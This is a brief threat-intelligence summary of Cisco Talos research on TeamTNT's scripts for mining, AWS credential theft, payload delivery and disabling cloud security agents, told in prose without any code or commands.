TeamTNT Scripts

Various script files used by the threat group, TeamTNT against AWS and Alibaba have been examined by Cisco Talos. The scripts target Amazon Web Services (AWS), on-premise containers, and some Linux instances. The  ability of the scripts  varies as they are capable of initiating cryptocurrency mining, credential gathering, downloading additional payloads, modifying file permissions, disabling tools, and achieving persistence and lateral movement. An AWS credential discovery and stealing script "GRABBER_aws_cloud.sh" can  enumerate the host's directory, querying for the string AWS. When matches are identified, the script writes the result to a file, exfiltrates the data, and deletes the created file. Scripts downloading payloads often conduct a check on the system's architecture to ensure a compatible script is downloaded for execution. TeamTNT is quite proficient in the cloud space, in addition to the abundance of robust scripts, the group has initiated techniques observed by Trend Micro, Cado Security, and Cisco Talos to disable cloud security and cloud logs. Whilst agents associated with Alibaba, Tencent, and BMC Helix Cloud Security were targeted some omissions have been observed by Cisco Talos, "TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools."

‍